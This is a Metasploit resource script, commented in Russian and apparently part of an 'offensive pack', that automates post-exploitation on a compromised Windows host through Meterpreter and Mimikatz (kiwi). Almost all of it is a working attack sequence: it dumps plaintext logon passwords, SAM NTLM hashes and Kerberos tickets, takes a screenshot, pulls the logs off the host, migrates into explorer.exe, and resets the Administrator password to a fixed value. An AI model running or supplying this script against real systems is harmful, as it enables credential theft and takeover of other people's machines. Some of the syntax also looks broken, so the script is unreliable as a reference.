##
# Mimikatz Autoload — Промышленная версия (TeslaAI Genesis Offensive Pack)
# Используется для пост-эксплуатации через Meterpreter: сбор creds, hashdump, ticket extraction

<ruby>

# === Инициализация сессии ===
setg SESSION -1
setg VERBOSE true
setg LOG_PATH /tmp/mimikatz_logs/

# === Загрузка Kiwi (Mimikatz через Metasploit) ===
load kiwi

# === Создание директории логов ===
makedir <%= LOG_PATH %>

# === Получение системной информации ===
echo "[*] Системная информация"
sysinfo
getuid
ps

# === Сбор паролей и хешей ===
echo "[*] Локальные пароли пользователей (sekurlsa::logonpasswords)"
kiwi_cmd sekurlsa::logonpasswords
kiwi_cmd sekurlsa::msv
kiwi_cmd sekurlsa::tspkg
kiwi_cmd sekurlsa::wdigest

# === Dump NTLM-хешей из SAM ===
echo "[*] Dump SAM хешей (lsadump::sam)"
kiwi_cmd lsadump::sam

# === Сбор Kerberos тикетов ===
echo "[*] Dump Kerberos tickets"
kiwi_cmd sekurlsa::tickets
kiwi_cmd kerberos::list

# === Сохранение артефактов ===
echo "[*] Сохраняем данные на диск"
screenshot
download /tmp/mimikatz_logs/

# === Обход UAC и миграция ===
echo "[*] Пробуем миграцию в explorer.exe (если доступно)"
run migrate -n explorer.exe

# === Опционально: создать shell и попытка сброса пароля администратора ===
shell
net user Administrator newpass123!

# === Завершение ===
echo "[*] Пост-эксплуатация завершена"
exit -y

</ruby>
